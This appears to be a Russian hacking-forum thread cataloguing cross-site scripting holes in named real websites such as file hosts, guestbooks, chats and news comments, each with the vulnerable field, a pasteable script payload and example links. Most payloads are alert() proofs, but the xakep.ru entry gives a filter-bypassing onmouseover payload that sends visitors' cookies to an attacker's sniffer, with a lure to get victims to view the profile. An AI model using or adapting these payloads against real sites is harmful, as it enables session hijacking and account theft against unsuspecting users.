www.web-hack.ru www.web-hack.ru --> добавить новость Вбиваем все данные на фонарь кроме кода, его вводим правильно. В саму новость(textarea) пишем: Code: <script>alert(document.cookie)</script> и жмем кнопочку добавить (Аdd) ps Как выяснилось, она является активной.
www.wikiupload.com Заливаем любой файл...в описание пишем Code: '"><script>alert(/xss/)</script> Кнопочку "upload" жмем... Выдается 2 ссылки, одна на скачку, другая на комментарии файла.. Идем в каменты и видим хсс Пример Code: http://www.wikiupload.com/comment.php?id=158669
chatcity.ru Ну вообщем то........вроде чаты на chatcity Поля: E-mail web-страничка Вот один пример на volchat.ru Code: http://volchat.ru/people/pp0.cgi?c=13397&cn=trane___
www.xakep.ru хсс в чате уязвимо любое поле, но только одно, там нет ограничения на кол-во символов, но стоит фильтрация символов: " ? + это можно спокойно обойти через String.fromCharCode() сам код идет в виде "onmouseover="navigate('адрес_снифера'.concat(document.cookie))" или просто "onmouseover="alert('xss')" кодируем navigate('адрес_снифера'.concat(document.cookie)) с помощью http://ha.ckers.org/xss.html получится примерно и пишем в виде "onmouseover="String.fromCharCode(то что закодировали)" ну чтоб все заработало там ставится галка "Допустить других к просмотру профайла" и говорим посмотрите мой профиль вот так) зы спс DimOnOID за небольшую помощь)
www.panvasoft.com Весьма популярный,посещаемый сайт. потставляем "><script>alert()</script> во все поля в коментариях. Пример:http://panvasoft.com/rus/11970/gb/ www.hpclub.ru Добавление комментарий "><script>alert()</script> Пример:http://www.hpclub.ru/news.php3?cID=4 www.consultclub.biz Добавление комментарий "><script>alert()</script>[/B]
www.lektravi.ru Интернет магазин Лекарственные травы Травки не желаете....=) Активка в гостевой, при добавлении сообщения в поле почта пишем Code: '><script>alert("ShaDow");</script> пример
www.internet.ru Уязвимые поля: "Ваше имя";"Тема". Добавление комментарий: <script>alert()</script> Пример: http://www.internet.ru/news/2007-06-17409#comment-16117
nm.ru http://www4.nm.ru/users/reg.dhtml?__post=1&login=asdasdasdasd&domain=<script>alert()</script>&passwd=asd&pass2=asd&quest_helper=&quest=&answ= это пассивная xss. чтобы сделать ее активной, пишем html-мессагу и подключаем xss через ифрейм.
http://www.hotfile.ru Закачиваем файл любой, в поле "Описание" суем наш зловредный код. В данном случае Code: '"/><script>alert(/xss/)</script> Получаем линк на скачивание, смотрим - активная хсс Пример - http://www.hotfile.ru/52377/ http://meetfile.com Зарегистрировались, заходим в профиль, изменяем его.. Уязвимы все поля... Code: '"/><script>alert(/xss/)</script>
http://www.fos.ru/ Заходим в гостевую книгу, нажимаем создать новое сообщение и пишем: Code: '><script>alert('xss')</script> уязвимы все поля
http://provodka.ru/news.php?part=3&id=7545 Оставляем комментарий такого содержания: Code: "/><script>alert(/xss/)</script> уязвимы оба поля
1. Сервис загрузки файлов на сервер http://ifile.kiev.ua/ В поле "ОПИСАНИЕ" пишем Code: '"/><script>alert(/xss/)</script> Пример http://ifile.kiev.ua/download_file/618/ 2. Сервис загрузки файлов на сервер http://www.sendfiles.com.ua После загрузки файла, в описании пишем Code: '><script>alert(/xss/)</script> Пример http://www.sendfiles.com.ua/24431 UPD тут же: При добавлении коментария, пишем в поле "Отзыв" Code: <script>alert(/xss/)</script>
http://www.skoda-russia.ru/resume.php Оставляем комментарий такого вида: Code: "><font color=red onmouseover=javascript:alert('xss')>алерт работает!</font>
